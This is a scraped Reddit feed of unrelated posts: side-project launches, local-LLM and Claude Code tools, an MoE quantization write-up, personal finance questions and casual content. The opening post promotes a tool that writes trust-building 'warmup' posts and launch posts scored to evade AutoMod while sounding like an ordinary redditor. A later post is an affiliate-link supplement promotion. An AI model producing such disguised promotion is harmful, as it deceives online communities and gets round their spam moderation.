posted here a couple days ago about Reddit working way better than PH for me. got a bunch of replies and a few DMs asking if I had the notes somewhere structured.

I've been quietly turning those notes into a small tool. it's called LaunchReddit. you describe your product, pick 1–3 subreddits, and it generates:

- 3 warmup posts for each sub (story-first, no links, just to build trust)

- 2 launch posts with subreddit-specific angles (risk-scored and edited multiple times by Claude Sonnet)

- short reply templates for when people ask "how does it work" or "isn't this just spam"

- a 7-day posting schedule

- a risk score per post so you know if it'll survive AutoMod

the output is intentionally imperfect, trying to sound like a redditor, not a marketer.
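A toy version of the per-post risk score might just weight patterns known to trip AutoMod; these heuristics and weights are invented for illustration, not LaunchReddit's actual scoring:

```python
import re

# Weighted patterns that commonly trip AutoMod; weights are invented for illustration.
RISK_SIGNALS = [
    (r"https?://", 2.0),                      # links from fresh accounts are high risk
    (r"\b(buy now|discount|limited time)\b", 1.5),
    (r"\b(launch(ed|ing)?|sign ?up)\b", 1.0),
]

def automod_risk(post: str) -> float:
    """Sum weight * match-count over all risk patterns."""
    text = post.lower()
    return sum(w * len(re.findall(p, text)) for p, w in RISK_SIGNALS)

print(automod_risk("We just launched! Sign up at https://example.com"))
```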

First kit's completely free: www.launchreddit.site

would love brutal feedback on the post quality. does it actually sound like something that would survive in r/SaaS or r/indiehackers?

And of course, ANY new function to the tool will be fully FREE for your existing kits! ☺️

r/SideProject Daniel_SES

I built an MCP server that lets Claude audit and fix your SEO - 7 days of building, sharing what I learned

Been shipping micro-SaaS recently. This time, I built something I actually wanted: an SEO layer that lives inside Claude.

The problem I kept running into: I know my sites have SEO issues. I don't want to learn SEO. I want Claude to handle it.

So I built SEOLint - an MCP server you connect to Claude Desktop or Claude Code in 2 minutes. Then Claude can:

  • Scan any URL and return structured issues with AI-written fix instructions
  • Remember every scan - labels issues as NEW / PERSISTING / REGRESSED
  • Analyse your whole site: goal, ICP, primary keyword, structural gaps across pages
  • Show you the actual broken HTML element so fixes are immediate, not generic

The workflow: get_site_intelligence -> get_open_issues -> fix in codebase -> mark_issues_fixed

Here's a demo: https://www.youtube.com/watch?v=RNAr07ZLHFg

Also ships as a CLI (npx @randomcode-seolint/cli scan https://yoursite.com) and REST API for GitHub Actions.

Stack: Next.js 16 + Supabase + Anthropic API (Haiku for fix instructions) + Vercel

7 days from idea to launch. Happy to answer questions about the build.

seolint.dev

r/LocalLLaMA ReflectionOk9332

Open-source dashboard for managing multi-agent teams — supports Hermes Agent natively

I've been running a team of AI agents for a few months and hit the classic coordination wall. One agent was fine. Four was chaos. More than that, I was a full-time middle manager.

That led to Org Studio — an open-source dashboard that applies real org design principles to agent teams. Think: mission, values, domain boundaries, and a feedback loop that makes agents improve over time.

Multi-runtime support: Org Studio connects to both OpenClaw and Hermes Agent simultaneously. Each runtime implements a simple interface (discover, send, health), and the registry routes everything automatically.

The fun part: a Hermes agent can u/mention an OpenClaw agent in a task comment, and the notification routes to the right runtime. Cross-runtime communication via a task board.

Features:

• Team topology with domain ownership

• Event-driven task board (agents pick up work instantly)

• Vision-driven sprints (define outcomes, not tasks)

• Auto-detected feedback → operating principles injected into agent context

• Multi-runtime: OpenClaw + Hermes out of the box

• File storage by default, optional Postgres

Try it:
npx create-org-studio@latest
GitHub: https://github.com/ToomeSauce/org-studio

Site: https://orgstudio.dev

Origin story: https://orgstudio.dev/blog/origin-story

Happy to answer questions about the architecture or the org design approach.

r/mildlyinteresting Key-Tank-8093

found a fried maggot in my pistachio yesterday

r/homeassistant OfficialGreenTea

Energy data to Apple Home with HomeBridge?

I’ve connected Apple HomeKit to Home Assistant, where HomeKit is the front-end for my household and I connect all our sources using Home Assistant on the backend. This has been working great so far.

I noticed iPhone widgets have the ability to visualise energy dashboards. I have this data available in home assistant. Is there any way to push this data to HomeKit, for example using the HomeBridge integration?

r/personalfinance eggwuah646

Buying a used vehicle.

Good morning all, I have somewhat of a handle on financial literacy, but sometimes I feel like that doesn’t mean much. Anyways…

Me and my wife bring home about 8k a month, and we want to buy a full-size SUV. We have a home loan at about 240k, and we want to pay off the house ASAP. But she is pregnant with our 2nd kid. A current vehicle we are looking at is a 2013 Chevrolet Suburban with 150k miles for 12k. The interior is perfect, mechanically it sounds fine, and it has a good-looking Carfax, but I’m hesitant to pull the trigger. With 3k down I’m looking at $450 a month for 2 years at 4% APR.

I want to hear your guys' opinion: is this smart, or is this just flat out stupid?

r/ollama dreamy_walker

I wanted Ollama to hold a job, not just answer prompts, so I built this

Most local AI tools built around Ollama are good at one run.

What I kept missing was the work layer around the model:

- where the rules live

- where unfinished work lives

- where outputs accumulate

- where reusable procedures live

- where an automation can come back later without starting from zero

So I built Holaboss:

- open-source desktop + runtime

- uses Ollama as a local OpenAI-compatible backend

- Each AI worker gets a persistent workspace

- workspaces can hold AGENTS.md, workspace.yaml, local skills, apps, outputs, memory, and runtime state

- The goal is not just "better replies"

- The goal is "can a local AI setup keep holding the same work over time?"

Why I built it:

I don't think the hard part is getting one decent answer from a local model anymore.

The harder problem is whether the system can come back tomorrow, see what was pending, preserve context cleanly, and keep moving without relying on one giant chat transcript.

Ollama setup is straightforward:

- run Ollama locally

- point Holaboss to: http://localhost:11434/v1

- use API key: ollama

- pick your installed model in the desktop app
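That OpenAI-compatible wiring amounts to posting to /v1/chat/completions on the base URL above. A minimal stdlib sketch (the model name is an example; Ollama ignores the API key's value but OpenAI-style clients require one):

```python
import json
import urllib.request

BASE_URL = "http://localhost:11434/v1"  # Ollama's OpenAI-compatible endpoint

def chat_request(model: str, prompt: str) -> urllib.request.Request:
    """Build (not send) an OpenAI-style chat completion request against Ollama."""
    body = json.dumps({
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
    }).encode()
    return urllib.request.Request(
        f"{BASE_URL}/chat/completions",
        data=body,
        headers={
            "Content-Type": "application/json",
            "Authorization": "Bearer ollama",  # value is ignored by Ollama
        },
    )

req = chat_request("llama3.1:8b", "Summarize pending tasks in this workspace.")
print(req.full_url)
```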

Current status:

- MIT licensed

- macOS supported today

- Windows/Linux support is still in progress

If you're deep in the Ollama ecosystem, I'd love feedback on where this should go next:

- coding workflows?

- research workspaces?

- recurring automation / ops?

- better inspectability and handoff?

GitHub: https://github.com/holaboss-ai/holaboss-ai

If you think the direction is useful, a star ⭐️ would be appreciated.

r/SideProject Financial-Muffin1101

From scared solo dev with zero sales experience to 600 MRR in ~4 weeks – what I actually did (fully documented)

A few weeks ago I was terrified to launch my first SaaS. Zero sales background, no network, no marketing skills. I kept thinking “who the hell is going to pay me?”

Today I’m sitting at $600 MRR!

Here’s exactly what I did, step by step. No fluff, no “I crushed it” narrative — just the real actions that moved the needle.

1. I didn’t wait for validation

I didn’t run surveys, build waitlists, or ask people if they would pay.

I simply built the one thing I know deeply.

That was it. No customer interviews. No fancy validation process. Just deep personal pain + technical knowledge.

2. I chose a “boring” problem on purpose

Everyone loves building flashy AI tools or consumer apps.

I deliberately went for something boring but painful: helping new SaaS sites look trustworthy by showing they care about privacy and accessibility.

Why? Because boring problems are much easier to market.

Founders who just launched don’t need another fun toy. They need something that makes their site stop looking sketchy so people actually sign up.

3. What I actually built & shipped

I created a simple automated scanner that checks a website for:

- Privacy issues (trackers, cookies, GDPR/CCPA signals)

- Accessibility problems (basic WCAG checks)

- Overall trust signals

If it passes, the user gets a clean trust badge they can display on their site + a backlink.

The whole product is deliberately minimal. No complex dashboards, no AI hype — just something that solves a real, recurring pain.
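A hypothetical sketch of the kind of checks such a scanner might run (the product's actual rules aren't public; the tracker list and WCAG mappings here are illustrative):

```python
from html.parser import HTMLParser

KNOWN_TRACKERS = ("googletagmanager.com", "facebook.net", "hotjar.com")  # illustrative list

class TrustScan(HTMLParser):
    """Collect basic privacy/accessibility issues while parsing a page."""
    def __init__(self):
        super().__init__()
        self.issues = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "html" and not a.get("lang"):
            self.issues.append("html missing lang attribute (WCAG 3.1.1)")
        if tag == "img" and not a.get("alt"):
            self.issues.append("img missing alt text (WCAG 1.1.1)")
        if tag == "script" and any(t in a.get("src", "") for t in KNOWN_TRACKERS):
            self.issues.append(f"third-party tracker: {a['src']}")

scanner = TrustScan()
scanner.feed('<html><body><img src="hero.png">'
             '<script src="https://www.googletagmanager.com/gtm.js"></script></body></html>')
print(scanner.issues)
```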

4. How I got the first users (zero ad spend)

- Posted raw, honest updates on Reddit (r/SaaS, r/indiehackers, r/microsaas)

- Replied helpfully in relevant threads

- Reached out personally to a few recently launched founders

- Offered free scans + honest feedback

When small technical issues appeared, I woke up early, fixed them, manually rescanned affected users, and sent personalized emails.

That personal touch alone brought in feedback and conversions.

5. Key lessons I learned fast

- You don’t need perfect validation. You need to solve a problem you understand deeply.

- Boring products are easier to sell than exciting ones — especially to other indie founders.

- Personal support and quick fixes still work incredibly well in 2026.

- Consistency + showing up while scared beats waiting for confidence.

I’m still a solo dev working long days, still full of doubts sometimes, but the progress is real.

I’ll keep documenting the journey here (onboarding struggles, what’s working, what’s not).

If you’re a solo founder who’s scared to start or doubting yourself — just know I was exactly where you are.

You don’t need to be a marketer. You don’t need validation.

You just need to build the one thing you know really well.

Keep shipping.

Edited: formatting

r/homeassistant Own-Chemistry-495

Is a 500GB SSD overkill? I'm looking for an SSD for my Thin Client 5070; maybe a cheap 128GB is more than enough for Home Assistant. I found a 500GB SSD for 35 bucks on eBay.

r/LifeProTips Nighthawkies

LPT:Fixing your Social media feeds (actually getting new stuff that you'd want to see)

I had an issue where I kept getting recommended stuff I wasn't interested in, but interacted with anyway because it was the only thing available.

Or I kept getting recommended the same things I'd already seen.

To fix this, whenever I noticed something interesting I'd interact with it right away, and if I didn't, I'd save it. Later, when my algorithm stagnated, I could start from those saves, and it would start recommending me more similar stuff.

r/personalfinance strongerthenbefore20

How would you rate my current financial situation, and what can I being doing better to maximize my earnings and savings?

Background

  • I am 28 years old, single, and don't have any kids. I have no financial debts of any kind.
  • I currently have a full-time retail sales job where I make roughly $1,500 every other week after taxes. My average monthly expenses including rent are around $1,800 a month.
  • I have $37,000 in a HYSA, $3,200 in my checking account, $7,800 in my 401k, and $9,000 in my Roth IRA. I have currently put $2,000 in my IRA for the year and have set up monthly payments that will get me to the $7,500 limit by the end of the year.
  • Overall, how would you rate my financial situation? Am I in a good place, or do I need to change some things? Also, aside from trying to find a higher paying job, what can I do to increase my earnings and savings?

r/ChatGPT SargDuck

Why do LLMs refuse to format the Universal Declaration of Human Rights?

I asked ChatGPT and another LLM to do some light formatting on the document, but they both refused. It is specific to the English version, as I did some formatting on other languages and it worked fine. Any reason for that?

r/ChatGPT KingSlayer-tvu

Subscribed user yet limited image generation?

Before anyone says “it resets”, I went an entire weekend without generating any images on ChatGPT, only for it to tell me to wait twenty minutes because I hit the limit. I had only been using it for about an hour and generated fewer than ten images.

Something about this does not feel right, and I am starting to realize I may not need to stay subscribed if it is no different from other image generator apps. At least those show your credits clearly, while ChatGPT leaves you guessing and ends up wasting your time.

r/interestingasfuck Distinct-Question-16

While dinosaurs went extinct 66 million years ago, recent genetic and molecular studies place the origin of the cactus family (Cactaceae) at roughly 30 to 35 million years ago. Meaning: no cacti existed while dinosaurs did.

r/ChatGPT RUSTIOO_FOR_LIFE

CHAT GPT BROKEN

When I send it something, it finishes writing and then deletes the message. Can anyone relate?

r/leagueoflegends Master_Outside8981

A 2V1 Yasuo Play

r/SideProject Shot_Fudge_6195

I'm building a Skill that lets agents find and pay for data on their own

I'm a PM turned founder, and I kept hitting the same problem: every AI agent I saw could think great but couldn't access anything useful without a human setting up API keys, billing accounts, and integrations for each data source.

So I started building a unified skill for agents. One endpoint. Agent hits it, discovers what data is available, pays per request, and gets the data back. No human setting up billing. No managing 15 vendor dashboards.

The idea in simple terms:

  • Agent needs company financials? → Queries our API → Sees 3 vendors offer it → Pays $0.002 per request → Gets the data
  • Agent needs weather + flight prices + hotel rates for a trip? → One API, pays as it goes
  • Data vendors list their data once → Get paid automatically when agents use it

Think of it like a marketplace where the buyers are AI agents and the sellers are data providers, with payments happening at the protocol level.
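Agent-side, the flow sketched above reduces to discover → select vendor → pay per request. Every vendor, dataset, and field name below is hypothetical; this only illustrates the selection step:

```python
# All vendors, datasets, and prices are invented for illustration;
# monid.ai's real catalog and API may look nothing like this.
from dataclasses import dataclass

@dataclass
class Offer:
    vendor: str
    dataset: str
    price_per_request: float

CATALOG = [  # stand-in for a discovery endpoint's response
    Offer("vendor-a", "company_financials", 0.002),
    Offer("vendor-b", "company_financials", 0.003),
    Offer("vendor-c", "weather", 0.001),
]

def cheapest(dataset: str) -> Offer:
    """Agent-side vendor selection: pick the lowest price for the dataset."""
    offers = [o for o in CATALOG if o.dataset == dataset]
    if not offers:
        raise LookupError(f"no vendor offers {dataset!r}")
    return min(offers, key=lambda o: o.price_per_request)

best = cheapest("company_financials")
print(best.vendor, best.price_per_request)
```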

Where I'm at:

  • Working prototype with 3 data sources connected
  • payment flow working end-to-end
  • Talking to design partners on both sides (agent builders + data vendors)
  • Solo founder, bootstrapping for now

I'd love honest feedback: 1. Does this problem resonate with anyone building agents? 2. What data sources would you want access to first? 3. Am I overthinking the payments piece — would API keys + Stripe be enough?

Here's my mvp product if anyone's curious: https://monid.ai/

r/ClaudeCode WorldlinessHorror708

A harness-first Claude Code plugin for non-trivial engineering work

Repo: https://github.com/Done-0/openarche

OpenArche is a harness-first Claude Code plugin for non-trivial engineering work. It keeps complex tasks from closing before planning, validation, review, and closeout are explicit.

Features

  • Task grading: decides whether a task stays light or enters harness control
  • Embedding-based routing: uses the configured embedding backend to separate plain questions from execution work without language-specific keyword lists
  • Persistent sessions: materializes .openarche/sessions//state.json only when execution work actually starts
  • Stage gates: keeps validation, review, and maintenance open until they are actually closed
  • Context injection: adds current task state, gate reasons, and relevant local knowledge
  • Knowledge recall: retrieves repository-local knowledge first, then global knowledge, through embeddings and link expansion
  • Background closeout: captures reusable knowledge after the task stops

Installation

  1. add the marketplace entry: /plugin marketplace add Done-0/openarche
  2. install the plugin: /plugin install openarche
  3. reload plugins: /reload-plugin
  4. run setup: /openarche:setup

If you use local embeddings, the first successful run may need network access to download the model files. If you prefer API-backed embeddings, switch to remote in /openarche:config.

How It Works

  1. Use Claude Code as usual.
  2. Light tasks stay lightweight. Non-light tasks receive harness context first, and .openarche/sessions//state.json is materialized only for explicit execution work or, by default, after actual write activity starts.
  3. OpenArche tells Claude Code why the task was gated, which stages are still open, and which local knowledge is relevant.
  4. The status line and session state keep showing what is still open, so the task does not quietly close too early.
  5. Validation, review, and maintenance stay open until the required evidence is recorded inside the current session state and evidence directory.
  6. When the task stops, OpenArche closes out the session and queues reusable knowledge capture for that transcript.

r/ChatGPT Previous-Drop-1742

Asking DeepSeek if Taiwan is a country.

r/leagueoflegends 1niceHensler

Looking for Tutorials/Let’s Plays/Guides for Demacia Rising

As the title says, I don’t really care for the gameplay of this Event and don’t have the time to learn every mechanic and such.

I’ve been dependent on Reddit posts (army-setup-wise) to unlock new settlements for a while now and it’s getting quite boring. I really only care about the rewards, so it’s a pain to play this by myself and constantly fail.

I’d really appreciate any help. Thanks a lot in advance!

r/pelotoncycle skyy_mall

Jess King’s 3/19 Techno Ride’s playlist

Is maybe the best playlist I've ever encountered on the platform (and I'm 2,010 rides in, for context!). I've already taken it 3 times; it is mind-meltingly good!!

r/ClaudeCode Direct-Push-7808

I got tired of re-explaining everything when switching between Claude Code and Codex — so I built a bridge that gives each tool the other's conversation history

The problem

When you switch between Claude Code and Codex, your conversation history stays siloed. Claude has no idea what you built in Codex last week, and vice versa.

With usage limits on both platforms, switching tools mid-project is increasingly common - and every time you do, you lose all the context from your previous sessions.

What I built

context-bridge — a Python CLI with zero external dependencies that reads directly from the local data stores both tools already maintain:

- Codex: ~/.codex/state_5.sqlite + JSONL rollouts

- Claude Code: ~/.claude/projects/*.jsonl

It installs as a skill in both tools, so the AI knows when and how to search the other's history.
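Reading those Claude Code JSONL files is straightforward; this sketch assumes only that each line is a JSON record (the exact schema varies by version), and it runs against a throwaway directory rather than the real ~/.claude/projects:

```python
import json
from pathlib import Path

def search_history(root: Path, needle: str):
    """Yield (file, line_no, snippet) for JSONL records that mention `needle`."""
    for path in sorted(root.glob("**/*.jsonl")):
        for i, line in enumerate(path.read_text().splitlines(), 1):
            try:
                rec = json.loads(line)
            except json.JSONDecodeError:
                continue  # skip partial/corrupt lines
            text = json.dumps(rec)  # crude: search the whole serialized record
            if needle.lower() in text.lower():
                yield path.name, i, text[:120]

# Demo against a throwaway directory instead of the real ~/.claude/projects
demo = Path("demo_projects")
demo.mkdir(exist_ok=True)
(demo / "s1.jsonl").write_text(
    '{"role": "user", "content": "refactor the auth middleware"}\n')
print(list(search_history(demo, "auth")))
```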

GitHub: github.com/vguptaa45/context-bridge

r/SideProject Dramatic-Air-6507

Thorne 20% Off Discount Code

I’ve been using Thorne supplements for a while now and they’re one of the few brands I keep coming back to. The biggest difference compared to a lot of supplement companies is the ingredient quality. Thorne is known for using well-researched forms of vitamins and minerals, and many of their products are third-party tested, which gives a bit more confidence that you’re actually getting what’s on the label.

What I like is that their lineup covers a lot of practical daily supplements without a ton of unnecessary fillers. Things like their Basic Nutrients multivitamin, Vitamin D/K2, Magnesium, and Creatine are pretty popular because they focus on effective dosing rather than flashy marketing. Capsules are usually easy to take, and I’ve never noticed the weird aftertaste or stomach issues that some cheaper supplements can cause.

They’re definitely not the cheapest option out there, but that seems to be the tradeoff for quality control and cleaner formulations. If you’re someone who takes supplements regularly and cares about ingredient sourcing and testing, Thorne is one of the more reputable brands in the space. It’s a solid option if you’re trying to build a simple, reliable supplement stack without guessing which brands are legit.

You can use this link to get 20% off discount on your order as well. Hope it helps!
https://get.aspr.app/SH1eP2

r/mildlyinteresting BurnMeInTheStars

This wild rabbit has a hole in the ear.

r/LocalLLaMA StacksHosting

Why APEX Matters for MoE Coding Models and why it's NOT the same as K quants

I posted about my APEX quantization of QWEN Coder 80B Next yesterday and got a ton of great questions. Some people loved it, some people were skeptical, and one person asked "what exactly is the point of this when K quants already do mixed precision?"

It's a great question. I've been deep in this for the last few days running APEX on my own hardware and I want to break down what I've learned because I think most people are missing the bigger picture here.

So yes K quants like Q4_K_M already apply different precision to different layers. Attention gets higher precision, feed-forward gets lower. That's been in llama.cpp for a while and it works.

But here's the thing nobody is talking about.

MoE models have a coherence problem. I was reading this article last night and it clicked for me. When your coding agent is working across multiple files, different experts handle different tokens. The expert that processed your collision logic might not be the same expert that processes your entity initialization. The routing is efficient but the representation gets fragmented.

Think about that. Your agent is writing a function in one file that references a variable in another file and different experts handled each piece. What holds it all together?

The shared experts and attention layers. These fire on EVERY token no matter which routed experts get selected. They're the coherence layer. The glue. Without them your MoE model falls apart on complex multi-file coding sessions.

This is where APEX changes the game.

APEX knows about MoE architecture. It keeps those shared experts and attention at Q8, near lossless. The routed experts that only fire 3% of the time? Those get compressed harder. You're preserving the exact layers that matter most for keeping your agent coherent across long sessions.

Standard K quants have no idea about MoE roles. They see a feed-forward layer and compress it the same whether it's a shared expert that fires on every token or a routed expert that fires on 3% of tokens.

Now here's where it gets even better.

I ran my APEX quantization with a code-calibrated imatrix. 50,575 code samples. Not Wikipedia, not general chat, CODE. That imatrix tells APEX which specific weights within those shared coherence layers fire most during code generation, tool calling, and error recovery.

So it's three layers of optimization stacked:

  1. APEX preserves the shared/attention layers that maintain coherence across expert routing
  2. The code imatrix prioritizes the weights within those layers that actually fire during coding
  3. MoE routing means 97% of expert weights are idle per token so they compress aggressively with almost zero quality loss
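The role-aware policy described above boils down to a tensor-name → quant-type mapping. As a sketch, with llama.cpp-style tensor names; the name patterns and type choices here are illustrative, not APEX's actual rules:

```python
# Hypothetical role-aware precision assignment for an MoE model.
# Tensor-name patterns and quant types are illustrative, not APEX's real logic.
def pick_quant(tensor_name: str) -> str:
    if "shared_expert" in tensor_name or "attn" in tensor_name:
        return "Q8_0"   # coherence layers fire on every token: keep near-lossless
    if "ffn" in tensor_name and "exps" in tensor_name:
        return "Q3_K"   # routed experts fire on ~3% of tokens: compress hard
    return "Q4_K"       # everything else: moderate default

for name in ("blk.0.attn_q.weight",
             "blk.0.ffn_gate_shared_expert.weight",
             "blk.0.ffn_down_exps.weight"):
    print(name, "->", pick_quant(name))
```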

That's why Mudler's APEX I-Quality beats F16 on perplexity (6.527 vs 6.537). It's not just compressing less. It's compressing smarter. The coherence layers stay intact while everything else gets shrunk.

For anyone building coding agents on MoE models this matters. A lot. Your agent staying coherent across a 10 file refactoring session is literally the difference between useful output and garbage.

APEX is still very new, maybe a week or two old, but I believe this is the way forward for quality and speed, especially for people with limited hardware like myself.

Again, I'm learning this just like anyone else, but I'm here to share what I'm learning as I learn it.

Credit to Mudler (Ettore Di Giacinto) for creating APEX and LocalAI.

Credit to the article that helped me connect the dots on the coherence problem: https://x.com/sudoingX/status/2040836083731333381

My APEX I-Quality quant with code-calibrated imatrix: https://huggingface.co/stacksnathan/Qwen3-Coder-Next-80B-APEX-I-Quality-GGUF

Mudler APEX repo with tons of choices
https://huggingface.co/collections/mudler/apex-quants-gguf

r/leagueoflegends Professional-Try-231

which region should i pick?

I live in the ME, but I'm not sure if playing on that server is a good idea.

Does ping matter in League? I have never played this game before and I'm used to over 200 ping in games.

r/geography Melodic-Tennis-1622

Mediterranean pollution

I don’t know if this is the right sub, but for those who live on the Mediterranean: has anyone noticed how polluted the sea has become, especially this year?

I usually swim every week or so but I stopped in January after the intense storms we had until very recently, and I have never seen so much trash…

I live in Tunisia and I found plastic products from Italy, Algeria, Greece, France (and of course the usual Tunisian products) for the first time in my life! In February I literally found a Tunisian product that launched back in the late '80s…

Is this a local problem or is the Mediterranean in its most polluted era? I’ve never seen the sea like this

r/personalfinance traanquil

logged into my old 401K, it was converted and reduced to 0; i don't know where the money went

I logged into an old 401k from a previous employer which had a significant amount of money in it. I was surprised to find that the balance was at zero... the funds had been "converted." I was given no notice about this, and I cannot find out where this money went. I called ADP and they told me it went to Fidelity. I went to Fidelity and they have no record of it. WTH is going on, and is this even legal? How did this happen with no notice to me whatsoever?

r/funny jesstermc

At a real church in NC. See you all at noon 😂

r/ollama iamtheamn

FolliA v0.6: Native Android client for Ollama with Real-Time Streaming and Markdown support.

Hey everyone,

I'm an IT student and in my spare time, I've been developing FolliA, a native Android app designed to connect to your local Ollama instances. My goal was to build something lightweight, fast, and completely private (no cloud, no telemetry, just direct communication with your server).

I just released the v0.6 beta and wanted to share it with this community, as I've implemented a lot of features based on early feedback:

  • Real-time streaming: Watch the AI type its responses in real-time.
  • Session Context: The app now handles conversation history properly.
  • Markdown UI: Full support for code blocks, headers, and lists (with Light/Dark/AMOLED themes).
  • Dynamic Model Selection: Switch between your installed models directly from the chat UI.
  • IPv6 & Custom Ports: You can now easily configure the app to access your home server remotely via your personal VPN.

It's 100% free and open-source. You can grab the APK or check out the code here: https://github.com/iamtheamn/FolliA

I'd love to hear your feedback, bug reports, or feature requests to help me improve it further.

Thanks!

r/interestingasfuck isosaleh

Windtunnel dance routine

r/SideProject QuantumOtter514

Built a launch platform for products that aren't AI tools, Live Today 🚀

Been working on this one for a while and it's finally live.

Product51 is a launch platform for non-AI products. Meaning the product itself isn't an AI tool, though it may very well have been built using AI. The distinction matters to me: there are tons of great products out there that just happen to not have "AI-powered" anywhere in their marketing, and right now they're getting buried.

I built it because I kept seeing the same problem. Launch platforms are flooded with AI tools and it's getting hard to find anything else. Wanted a dedicated space for everything else.

It's early, we're actively launching new products, and I'm looking for more to feature.

If you've built something and want to get it in front of people, check it out: productfiftyone.com

At the risk of being ironic, I'm also launching on PH; you can check out the launch page here:

https://www.producthunt.com/products/product-51?utm_source=other&utm_medium=social

Would love any feedback too, happy to answer questions 👇

r/personalfinance Hellomyguy9090

401k loan, vested balance

Hello, so I took out a loan on my 401k for about $6,500, because with my company you can only borrow 50% of your vested balance. I still have $6,500 in my 401k; what happens to that amount if I decide to leave the company? I know if I default it will be deemed a distribution with the 10% penalty and taxes, but with what's left, do I need to roll it over to a Roth 401k?

r/personalfinance FJanon02

How to get out of a serious hole

Going through a divorce. My husband became a drug addict almost 2 years ago, lost his business and income, and blew all our savings; because I was the only one paying bills, I racked up about $23k in credit card debt. I can no longer make the minimum payments. I can't afford an attorney for the divorce or bankruptcy. I am drowning. I own my home, but the bills by myself are unmanageable. I am looking for a roommate, and I'm doing DoorDash and Uber Eats to try to bring in some extra. I don't qualify for food stamps because I don't have children. I would ideally like to do the hardship program on my credit cards and keep my CareCredit, as I do have dogs and it's nice for vet emergencies. Should I just stop paying? I'm applying for other jobs that pay more and have more benefits, but I haven't had any bites yet.

Any and all advice appreciated

r/mildlyinteresting mckenner1122

My sticks of butter were all misprinted the same way, about 3.25 TB off.

r/nextfuckinglevel Hellvis_50s

2 Skateboarders exchanging boards mid-air

r/ClaudeCode dydzio

Apparently Anthropic does not hunt OpenClaw hard enough...

r/leagueoflegends Past-Firefighter2173

GiantX vs Team Heretics PMT

GX wins quite comfortably. The early game was quite even, but Isma's ganks and Jun's plays made the game unplayable for TH.

r/SideProject lupo-01

Yapit – PDF and webpage reader with TTS that doesn't suck

Yapit converts PDFs and web pages to audio, with a vision-LLM pipeline that handles math and complex layout instead of garbling them. I built it because I read a lot of papers and content online, but drift off after two paragraphs. Listening while following along keeps me focused and lowers the bar to actually start.

Every TTS tool I tried broke on complex formatting. Papers with math, citations, figure references, page numbers in the middle of sentences. You either get garbled output or you're listening to raw LaTeX.

Yapit converts everything to markdown as a common format. For web pages, defuddle handles the extraction, strips clutter, and presents the main article content in a clean, consistent format. For PDFs, a vision LLM rewrites each page into markdown with annotation tags that separate what you see from what gets read aloud. Math is rendered visually but gets spoken alt text. Citations like "[13]" or "(Schmidhuber, 1970)" are displayed but not spoken. Page numbers and headers are removed entirely.

Both extraction and audio are cached by content hash, so the same content is never processed or synthesized twice.
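The content-hash caching idea can be sketched in a few lines. The function names and key layout here are my own assumptions for illustration, not Yapit's actual code:

```python
import hashlib

# In-memory stand-in for the cache; a real deployment would persist this.
_audio_cache: dict[str, bytes] = {}

def cache_key(markdown: str, voice: str) -> str:
    # Key on the extracted content itself (plus voice), so the same
    # document fetched twice hashes to the same entry.
    return hashlib.sha256(f"{voice}\x00{markdown}".encode()).hexdigest()

def get_or_synthesize(markdown: str, voice: str, synthesize) -> bytes:
    # Only call the (expensive) TTS backend on a cache miss.
    key = cache_key(markdown, voice)
    if key not in _audio_cache:
        _audio_cache[key] = synthesize(markdown, voice)
    return _audio_cache[key]
```

Because the key is derived from content rather than URL, re-fetching the same article under a different address still hits the cache.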

Self-hosting works with any OpenAI-compatible TTS server (vLLM-Omni, ...) and any OpenAI-compatible vision model for PDF extraction:

```bash
git clone --depth 1 https://github.com/yapit-tts/yapit.git && cd yapit
cp .env.selfhost.example .env.selfhost
make self-host
```

Kokoro TTS also runs in the browser via WebGPU on desktop.

Try it on Attention Is All You Need (all voices cached, no account needed).

Or paste any URL:

GitHub: https://github.com/yapit-tts/yapit (AGPL-3)

r/HistoryPorn Hammer_Price

Historic photos of TIBET 1924-26 & the NW Frontier 1932 & 1938 (794x600) were featured at Olympia Auctions (UK) on March 29. Reported by Rare Book Hub.

This lot with over 300 images sold for £6,500 ($8,582), well above the presale high estimate of £1,000.

(Excerpts from catalog notes)

PHOTOGRAPHS OF TIBET, CIRCA 1924-26, AND THE NORTH-WEST FRONTIER, 1932 & 1938
oblong folio (265 x 345mm), over 320 matt silver prints, mounted on card album leaves, recto and verso, most captioned in ink on the mounts (some mounts detached, album without covers or backstrip)

A very well presented and captioned album of photographs of Tibet taken by a British official or army officer in the 1920s. The photographs include Frank Ludlow who ran an English school in Gyantse between 1923 and 1926, and Frederick Williamson, a British Political Officer. The photographs show many images of Tibetan people, ceremonies, events, buildings and views.

The same March 29 Olympia event also saw sales of photographic lots depicting China, Japan and India from the late 19th and early 20th centuries.

r/ChatGPT GC_Vos

Anybody else stopped using ChatGPT and not looking back?

I used to really like using ChatGPT. It was very useful to me in a variety of ways, like coding, assisting with writing, working on DIY projects, etc. It was one of the first well-developed AI tools, and early on it felt really groundbreaking.

Last year however too many large cons started coming up.

Firstly, I really started to distrust whatever it was saying, because it could speak the truth or flat-out lie with the same level of confidence. I ended up debating or error-correcting ChatGPT way too much compared to just using it as a useful tool. Every time I asked for something, I wanted to double-check what it was saying, at which point it just became kind of useless to me.

Secondly, the weird behaviour with forcing users onto specific models, only to then partially backtrack because users became upset. How do you have access to all of this user data and not understand the user?

Thirdly, OpenAI cooperating with the US department of War was a huge red flag to me. OpenAI then going into damage control as they have done before just felt like a dumb PR decision. I basically stopped using it and switched to LeChat.

Anybody else now avoiding ChatGPT entirely?

r/PhotoshopRequest Alarmed-Pirate-6599

Edit please!

I had photos taken of me and my sons this last week, and I love this photo, but I can't get over my chin? double chin? area. Idk if she edited the photo some before giving it to me or what, but if you look closely, I don't understand why part of my chin looks really clear and then part of it looks muddled. I can't enjoy the photo because my chin looks so off to me 🤦🏻‍♀️

$5 to whoever can fix it please!!

This is the exact photo she gave me, so I haven’t changed anything on it.

r/comfyui the_frizzy1

Wan2.2 AIO: T2V, I2V and First to Last Frame on Consumer Hardware

Been genuinely enjoying the Wan2.2 Rapid All-In-One lately.

https://huggingface.co/Phr00t/WAN2.2-14B-Rapid-AllInOne

One file download, one workflow, and you get Text-to-Video, Image-to-Video, and First to Last Frame all working out of the box in ComfyUI. No separate VAE, no text encoder matching, nothing. Just drop it in and generate.

I tested it on my RTX 3060 and also covered the GGUF path for anyone on 4 to 6GB VRAM. Made a full video going through the setup, benchmarks, and all three modalities if anyone wants to see it.

Free workflow is on my CivitAI as always.

https://civitai.com/user/The_frizzy1

I also fixed the Node issue in Phr00ts repo and made a standalone node to work with my workflow and his:

https://huggingface.co/The-frizzy1/Custom-Advanced-VACE-Node

